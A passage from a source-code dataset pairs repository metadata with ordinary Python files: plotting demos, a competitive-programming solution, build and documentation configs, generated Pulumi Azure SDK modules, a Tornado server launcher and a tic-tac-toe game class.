] | permissive | wull566/tensorflow_demo | 4a65cbe1bdda7430ab1c3883889501a62258d8a6 | c2c45050867cb056b8193eb53466d26b80b0ec13 | refs/heads/master | 2020-04-06T17:34:05.912164 | 2018-11-15T07:41:47 | 2018-11-15T07:41:48 | 157,665,187 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,233 | py | # View more 3_python 2_tensorflow_old on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 14 - 3d
"""
Please note, this script is for python3+.
If you are using python2+, please modify it accordingly.
Tutorial reference:
http://www.3_python-course.eu/matplotlib_multiple_figures.php
"""
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
# X, Y value
X = np.arange(-4, 4, 0.25)
Y = np.arange(-4, 4, 0.25)
X, Y = np.meshgrid(X, Y)
R = np.sqrt(X ** 2 + Y ** 2)
# height value
Z = np.sin(R)
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
"""
============= ================================================
Argument Description
============= ================================================
*X*, *Y*, *Z* Data values as 2D arrays
*rstride* Array row stride (step size), defaults to 10
*cstride* Array column stride (step size), defaults to 10
*color* Color of the surface patches
*cmap* A colormap for the surface patches.
*facecolors* Face colors for the individual patches
*norm* An instance of Normalize to map values to colors
*vmin* Minimum value to map
*vmax* Maximum value to map
*shade* Whether to shade the facecolors
============= ================================================
"""
# I think this is different from plt12_contours
ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=plt.get_cmap('rainbow'))
"""
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the filled contour
on this position in plane normal to zdir
========== ================================================
"""
ax.set_zlim(-2, 2)
plt.show()
| [
"vicleo566@163.com"
] | vicleo566@163.com |
09948ecbf8dce75fc191482b02c52f34414e2dd2 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/AGC/agc037/agc037_a.py | 0a81674be640dbd4e2a9a68795fce2f0fa83a027 | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 205 | py | s = str(input())
count = 1
pre = s[0]
now = ""
for i in range(1, len(s)):
now += s[i]
if pre == now:
continue
else:
count += 1
pre = now
now = ""
print(count)
| [
"reohirao116@gmail.com"
] | reohirao116@gmail.com |
3948a716848ac63fa942f4ff68789df1d13eec70 | 342ec51a35eef43fe1bafa31bdf8f0c9ef956cd9 | /comlib.py | 2ef51158ec9e1743618a2ad4d19ab834c1795910 | [
"MIT"
] | permissive | Strangemother/python-simple-tts-stt | a60ff7ce4e4b9dd58a3a906c7a8c266b0dc6bb2a | e7ac38e795b32f55367a58107d86bf04ea906f0c | refs/heads/master | 2020-03-21T10:18:41.407181 | 2019-01-02T07:32:24 | 2019-01-02T07:32:24 | 138,444,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | import speech
import comtypes.client  # Importing comtypes.client will make the gen subpackage
import os

# Fail fast on non-Windows platforms: SAPI (the COM speech API used below)
# exists only on Windows.  An explicit check replaces the original
# `assert` (which is stripped under `python -O`) wrapped in a bare
# `except:` clause that swallowed the real error.
if os.name != 'nt':
    raise RuntimeError("Windows is required.")

try:
    from comtypes.gen import SpeechLib  # comtypes
except ImportError:
    # Generate the SpeechLib lib and any associated files
    engine = comtypes.client.CreateObject("SAPI.SpVoice")
    stream = comtypes.client.CreateObject("SAPI.SpFileStream")
    from comtypes.gen import SpeechLib
"jay@strangemother.com"
] | jay@strangemother.com |
5c82f1295336f62ee18d4ca09a43169108808919 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007-EOL/applications/hardware/bluez-utils/actions.py | 998201a4580feb5fd60d2b947e9349576906fa8d | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--enable-all \
--enable-pie \
--disable-initscripts \
--disable-sdpd \
--disable-hidd \
--localstatedir=/var")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
# move bluetooth rules into correct place
pisitools.domove("/etc/udev/bluetooth.rules", "/etc/udev/rules.d", "40-bluetooth.rules")
pisitools.dodoc("AUTHORS", "ChangeLog", "README")
# optional bluetooth utils
pisitools.dobin("daemon/passkey-agent")
pisitools.dobin("daemon/auth-agent")
pisitools.dosbin("tools/hcisecfilter")
pisitools.dosbin("tools/ppporc")
# bluez test
pisitools.dobin("test/hsmicro")
pisitools.dobin("test/hsplay")
pisitools.dobin("test/hstest")
pisitools.dobin("test/attest")
pisitools.dobin("test/apitest")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
07896960fbc3c364f8fa514f19481ea4d06edca5 | ae10b60cb92a69146bfb05ef5dde735a0aa45d4b | /examples/New Functions/Example distance 1.py | 2d8b3d0afa43d6027b21ee429f3c43c74def211d | [
"MIT"
] | permissive | kantel/nodebox-pyobjc | 471cea4c5d7f1c239c490323186458a74edcc214 | 068ba64c87d607522a240ab60c3ba14f869f6222 | refs/heads/master | 2021-08-14T18:32:57.995445 | 2017-11-16T13:42:23 | 2017-11-16T13:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 982 | py | import math
def params(val, name):
    """NodeBox variable-panel callback: update global x or y, then redraw.

    val  -- new slider value (a float from the NUMBER variable)
    name -- which coordinate the slider controls ("x" or "y")
    """
    global x, y
    # global scope needs updating.
    val = int(round(val,0))
    if name == "x":
        x = int(val)
    else:
        y = int(val)
    # Redraw the triangle with the updated leg lengths.
    triangle(x, y)
def triangle(x, y):
    """Draw a right triangle with legs x (horizontal) and y (vertical)
    anchored at (100, 160), label the legs, and print the hypotenuse
    length (uses NodeBox drawing primitives).
    """
    # Right-angle corner and the two leg endpoints.
    x0, y0 = 100, 160
    x1, y1 = x0 + x, y0
    x2, y2 = x0, y0 + y

    # draw a triangle
    stroke(0.2)
    nofill()
    strokewidth(2)
    autoclosepath(True)  # close the path back to the starting corner
    beginpath(x0, y0)
    lineto(x1, y1)
    lineto(x2, y2)
    endpath()

    # labels
    fill(0)
    lx,ly = x0 + (x/2.0), y0 - 10
    text("x", lx, ly)
    lx,ly = x0 - 15, y0 + (y / 2.0)
    text("y", lx, ly)

    lx,ly = x0, y0 -130
    text("x = %i" % x, lx, ly)
    lx,ly = x0, y0 -100
    text("y = %i" % y, lx, ly)
    # Hypotenuse runs between the two leg endpoints; `distance` is a
    # NodeBox builtin.
    d = round(distance(x1, y1, x2, y2), 4)
    lx,ly = x0, y0 -70
    text("hypotenuse ≈ %.4f" % d, lx, ly)
# Register two sliders in the NodeBox variable panel; var() also exposes
# `x` and `y` as globals (used below), and `params` redraws on change.
var("x", NUMBER, default=50, min=10, max=300, handler=params)
var("y", NUMBER, default=50, min=10, max=300, handler=params)
# Initial draw with the default slider values.
triangle(x,y)
| [
"karstenwo@web.de"
] | karstenwo@web.de |
9216428587f42a0e67dbf4b9393da0b0e71f9cdc | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/apimanagement/v20201201/get_content_item.py | 839b7064a377f6a60900dac782fc801a0b858684 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 3,523 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetContentItemResult',
'AwaitableGetContentItemResult',
'get_content_item',
]
@pulumi.output_type
class GetContentItemResult:
    """
    Content type contract details.
    """
    def __init__(__self__, id=None, name=None, properties=None, type=None):
        # Defensive type checks: this constructor is populated by the
        # Pulumi runtime from raw provider output.
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if properties and not isinstance(properties, dict):
            raise TypeError("Expected argument 'properties' to be a dict")
        pulumi.set(__self__, "properties", properties)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Resource ID.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Resource name.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def properties(self) -> Any:
        """
        Properties of the content item.
        """
        return pulumi.get(self, "properties")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type for API Management resource.
        """
        return pulumi.get(self, "type")
class AwaitableGetContentItemResult(GetContentItemResult):
    """Awaitable wrapper so the lookup result can be used with `await`."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable `yield` makes this method a generator, which is
        # what the await protocol requires; it resolves immediately.
        if False:
            yield self
        return GetContentItemResult(
            id=self.id,
            name=self.name,
            properties=self.properties,
            type=self.type)
def get_content_item(content_item_id: Optional[str] = None,
                     content_type_id: Optional[str] = None,
                     resource_group_name: Optional[str] = None,
                     service_name: Optional[str] = None,
                     opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetContentItemResult:
    """
    Content type contract details.

    Invokes the Azure API Management `getContentItem` data source
    (API version 2020-12-01) through the Pulumi runtime.

    :param str content_item_id: Content item identifier.
    :param str content_type_id: Content type identifier.
    :param str resource_group_name: The name of the resource group.
    :param str service_name: The name of the API Management service.
    """
    # Marshal the arguments into the provider's expected camelCase keys.
    __args__ = dict()
    __args__['contentItemId'] = content_item_id
    __args__['contentTypeId'] = content_type_id
    __args__['resourceGroupName'] = resource_group_name
    __args__['serviceName'] = service_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Default to this SDK's own version when the caller did not pin one.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:apimanagement/v20201201:getContentItem', __args__, opts=opts, typ=GetContentItemResult).value

    return AwaitableGetContentItemResult(
        id=__ret__.id,
        name=__ret__.name,
        properties=__ret__.properties,
        type=__ret__.type)
| [
"noreply@github.com"
] | morrell.noreply@github.com |
eaca57fe897b429426f4d1512460c6fe58b9fbd0 | c02ed092ce4fceff7f8b2cb0bdf8712141581e51 | /doc/conf.py | 82230848e00960bd70c7c19859a7b2ad1775d197 | [
"MIT",
"MIT-0"
] | permissive | ronaldoussoren/macholib | 376a953654c69d8c01e763efc0508346d420fa9f | 0f77e700f84690121bba872470bc825cecd23d97 | refs/heads/master | 2023-09-03T16:08:46.378443 | 2022-09-25T17:48:13 | 2022-09-25T17:48:13 | 231,951,689 | 72 | 15 | MIT | 2022-04-25T16:18:57 | 2020-01-05T17:24:17 | Python | UTF-8 | Python | false | false | 8,802 | py | # -*- coding: utf-8 -*-
#
# macholib documentation build configuration file, created by
# sphinx-quickstart on Tue Sep 28 22:23:35 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
def get_version():
    """Return the package version parsed from setup.cfg.

    Scans setup.cfg (one directory above this conf.py) for the first line
    starting with "version" and returns the text after the '=' sign,
    stripped. Returns None when no such line exists (matching the original
    implicit behaviour).
    """
    fn = os.path.join(
        os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "setup.cfg"
    )
    # Use a context manager so the file handle is closed deterministically
    # (the original left the handle open for the GC to collect).
    with open(fn) as fp:
        for ln in fp:
            if ln.startswith("version"):
                return ln.split("=")[-1].strip()
    return None
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Make the repository root importable so autodoc can find the package.
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.intersphinx"]

# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]

# The suffix of source filenames.
source_suffix = ".rst"

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = "index"

# General information about the project.
project = "macholib"
copyright = "2010-2011, Ronald Oussoren"

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# Both strings are read from setup.cfg (see get_version above) so the docs
# always track the packaged version.
version = get_version()
# The full version, including alpha/beta/rc tags.
release = version

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]

# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = "nature"

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = "macholibdoc"


# -- Options for LaTeX output --------------------------------------------------

# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'

# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
    ("index", "macholib.tex", "macholib Documentation", "Ronald Oussoren", "manual")
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Additional stuff for the LaTeX preamble.
# latex_preamble = ''

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [("index", "macholib", "macholib Documentation", ["Ronald Oussoren"], 1)]


# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = "macholib"
epub_author = "Ronald Oussoren"
epub_publisher = "Ronald Oussoren"
epub_copyright = "2010, Ronald Oussoren"

# The language of the text. It defaults to the language option
# or en if the language is not set.
# epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''

# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
# epub_identifier = ''

# A unique identification for the text.
# epub_uid = ''

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_pre_files = []

# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_post_files = []

# A list of files that should not be packed into the epub file.
# epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
# epub_tocdepth = 3

# Allow duplicate toc entries.
# epub_tocdup = True


# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
    "python": ("http://docs.python.org/", None),
    "altgraph": ("http://packages.python.org/altgraph", None),
}
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
c23e4d616602f79d9d239eacb7e8558f1639d2ff | e59602b7e17fafff70240700138bbe54ced28739 | /PythonSimpleVisualiser.py | 152c3204cf353fff3ddeab2c45ec43bdd5770b29 | [] | no_license | TestSubjector/CompGeometry2 | ddc3dae8517e45d419e7057f2d905ad5d95d67e7 | 3b7f30302c837d883132290789cd84305f0e0b10 | refs/heads/master | 2022-03-27T13:37:46.115463 | 2019-04-03T18:18:48 | 2019-04-03T18:18:48 | 177,393,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | ## Takes input from a text file and plots all points.
## Connects the points in order read and connects last point to first one.
import argparse
import matplotlib.pyplot as plt
def getArgParser():
''' Returns ArgParser object to handle command-line args'''
parser = argparse.ArgumentParser()
parser.add_argument("filepath",default="./input.ch",nargs="?",help="path of the input file")
return parser
if __name__ == '__main__':
parser = getArgParser()
args = parser.parse_args()
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
inputfile = open(args.filepath,"r")
storeType = inputfile.readline();
# print(storeType)
numberOfPoints, ch_indices = [int(a) for a in inputfile.readline().split()]
# print(numberOfPoints)
# print(ch_indices)
points = []
for i in range(numberOfPoints):
x,y,z = inputfile.readline().split()
points.append([float(x), float(y)])
if storeType == "CHG\n" or storeType == "CHJ\n":
ch_indices = [element for element in map(int,inputfile.readline().split())]
for point in points:
plt.plot(point[0],point[1],'bo')
for i in range(len(ch_indices)-1):
plt.plot([points[ch_indices[i]][0],points[ch_indices[i+1]][0]],[points[ch_indices[i]][1],points[ch_indices[i+1]][1]],'g-')
plt.plot([points[ch_indices[0]][0],points[ch_indices[len(ch_indices)-1]][0]],[points[ch_indices[0]][1],points[ch_indices[len(ch_indices)-1]][1]],'g-')
plt.show()
if storeType == "CHK\n":
ch_points = [element for element in map(str,inputfile.readline().split())]
ch_indices = []
for item in ch_points:
x,y = item.split(",")
ch_indices.append([float(x), float(y)])
for point in points:
plt.plot(point[0],point[1],'bo')
for i in range(len(ch_indices)-1):
plt.plot([ch_indices[i][0], ch_indices[i+1][0]],[ch_indices[i][1], ch_indices[i+1][1]],'g-')
plt.plot([ch_indices[0][0], ch_indices[len(ch_indices)-1][0]], [ch_indices[0][1], ch_indices[len(ch_indices)-1][1]],'g-')
plt.show()
inputfile.close()
| [
"f2015845@hyderabad.bits-pilani.ac.in"
] | f2015845@hyderabad.bits-pilani.ac.in |
95621f79a92dc69d3ca8f9ac1482bf81b28cb8fa | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/web/v20181101/get_web_app_function.py | f035db040d58335774ba7aec281ac9825034db4b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,319 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWebAppFunctionResult',
'AwaitableGetWebAppFunctionResult',
'get_web_app_function',
]
@pulumi.output_type
class GetWebAppFunctionResult:
"""
Web Job Information.
"""
def __init__(__self__, config=None, config_href=None, files=None, function_app_id=None, href=None, kind=None, name=None, script_href=None, script_root_path_href=None, secrets_file_href=None, test_data=None, type=None):
if config and not isinstance(config, dict):
raise TypeError("Expected argument 'config' to be a dict")
pulumi.set(__self__, "config", config)
if config_href and not isinstance(config_href, str):
raise TypeError("Expected argument 'config_href' to be a str")
pulumi.set(__self__, "config_href", config_href)
if files and not isinstance(files, dict):
raise TypeError("Expected argument 'files' to be a dict")
pulumi.set(__self__, "files", files)
if function_app_id and not isinstance(function_app_id, str):
raise TypeError("Expected argument 'function_app_id' to be a str")
pulumi.set(__self__, "function_app_id", function_app_id)
if href and not isinstance(href, str):
raise TypeError("Expected argument 'href' to be a str")
pulumi.set(__self__, "href", href)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if script_href and not isinstance(script_href, str):
raise TypeError("Expected argument 'script_href' to be a str")
pulumi.set(__self__, "script_href", script_href)
if script_root_path_href and not isinstance(script_root_path_href, str):
raise TypeError("Expected argument 'script_root_path_href' to be a str")
pulumi.set(__self__, "script_root_path_href", script_root_path_href)
if secrets_file_href and not isinstance(secrets_file_href, str):
raise TypeError("Expected argument 'secrets_file_href' to be a str")
pulumi.set(__self__, "secrets_file_href", secrets_file_href)
if test_data and not isinstance(test_data, str):
raise TypeError("Expected argument 'test_data' to be a str")
pulumi.set(__self__, "test_data", test_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def config(self) -> Optional[Mapping[str, Any]]:
"""
Config information.
"""
return pulumi.get(self, "config")
@property
@pulumi.getter(name="configHref")
def config_href(self) -> Optional[str]:
"""
Config URI.
"""
return pulumi.get(self, "config_href")
@property
@pulumi.getter
def files(self) -> Optional[Mapping[str, str]]:
"""
File list.
"""
return pulumi.get(self, "files")
@property
@pulumi.getter(name="functionAppId")
def function_app_id(self) -> Optional[str]:
"""
Function App ID.
"""
return pulumi.get(self, "function_app_id")
@property
@pulumi.getter
def href(self) -> Optional[str]:
"""
Function URI.
"""
return pulumi.get(self, "href")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="scriptHref")
def script_href(self) -> Optional[str]:
"""
Script URI.
"""
return pulumi.get(self, "script_href")
@property
@pulumi.getter(name="scriptRootPathHref")
def script_root_path_href(self) -> Optional[str]:
"""
Script root path URI.
"""
return pulumi.get(self, "script_root_path_href")
@property
@pulumi.getter(name="secretsFileHref")
def secrets_file_href(self) -> Optional[str]:
"""
Secrets file URI.
"""
return pulumi.get(self, "secrets_file_href")
@property
@pulumi.getter(name="testData")
def test_data(self) -> Optional[str]:
"""
Test data used when testing via the Azure Portal.
"""
return pulumi.get(self, "test_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppFunctionResult(GetWebAppFunctionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppFunctionResult(
config=self.config,
config_href=self.config_href,
files=self.files,
function_app_id=self.function_app_id,
href=self.href,
kind=self.kind,
name=self.name,
script_href=self.script_href,
script_root_path_href=self.script_root_path_href,
secrets_file_href=self.secrets_file_href,
test_data=self.test_data,
type=self.type)
def get_web_app_function(function_name: Optional[str] = None,
name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppFunctionResult:
"""
Use this data source to access information about an existing resource.
:param str function_name: Function name.
:param str name: Site name.
:param str resource_group_name: Name of the resource group to which the resource belongs.
"""
__args__ = dict()
__args__['functionName'] = function_name
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:web/v20181101:getWebAppFunction', __args__, opts=opts, typ=GetWebAppFunctionResult).value
return AwaitableGetWebAppFunctionResult(
config=__ret__.config,
config_href=__ret__.config_href,
files=__ret__.files,
function_app_id=__ret__.function_app_id,
href=__ret__.href,
kind=__ret__.kind,
name=__ret__.name,
script_href=__ret__.script_href,
script_root_path_href=__ret__.script_root_path_href,
secrets_file_href=__ret__.secrets_file_href,
test_data=__ret__.test_data,
type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
5fbbbba6af3dfcfca89cb54da6713158b0a6ecbd | 4e60e8a46354bef6e851e77d8df4964d35f5e53f | /main.py | ae35090fa53b38726ed25a70d0f2454551d2dee5 | [] | no_license | cq146637/DockerManagerPlatform | cbae4154ad66eac01772ddd902d7f70b62a2d856 | 9c509fb8dca6633ed3afdc92d4e6491b5d13e322 | refs/heads/master | 2021-04-09T13:58:14.117752 | 2018-03-19T13:41:04 | 2018-03-19T13:41:04 | 125,712,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # -*- coding: utf-8 -*-
__author__ = 'CQ'
import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from settings import settings
from url.urls import urls
from tornado.options import define, options, parse_command_line
define("port", default=8888, help="run on the given port", type=int)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
if __name__ == "__main__":
app = tornado.web.Application(
handlers=urls,
**settings,
)
parse_command_line()
print('The service is already running on port %s ...' % options.port)
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
| [
"1016025625@qq.com"
] | 1016025625@qq.com |
080f45148a5f23811232fe76aaf7c83e197d9bfb | e8eb2cecee1ebc47455917fa11a58e7b5a912b74 | /python_lessons/python_advanced_02_tic_tac_toe/app/model/game.py | c5b61a7de11ddc51661518c76607cd7bc169970c | [] | no_license | cyr1z/python_education | ad0f9e116536a5583a12e05efe41ee173639ea9c | 37b2edbccf6f96c59c14cabf4bf749a3ec0f503d | refs/heads/main | 2023-06-08T10:24:26.217582 | 2021-06-27T17:02:05 | 2021-06-27T17:02:05 | 359,467,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | """
Game module.
"""
from app.model.table import GameTable
from app.view.table_view import TableView
class Game:
"""
Game play class
"""
def __init__(self, numbers_map, player1, player2):
self.table = GameTable(numbers_map)
self.players = []
self.players.append(player1)
self.players.append(player2)
def play_step(self, player):
"""
play step for player
:param player: Player
:return:
"""
print(TableView(**self.table.choices))
number = player.get_choice(self.table)
return self.table.choice_handler(number, player)
def iteration(self) -> dict:
"""
running game step for player
:return: bool
"""
request = {}
for player in self.players:
request = self.play_step(player)
if request:
break
return request
| [
"cyr@zolotarev.pp.ua"
] | cyr@zolotarev.pp.ua |
1fcea8653789c9e4dfb17a9855b267d4c204b864 | a6d48cfa5e60ff635e7a6e87c49c5626b5cd9cc6 | /official/vision/beta/configs/video_classification.py | 06897d2a16c98f7b46533e193875fdd5e763a2a7 | [
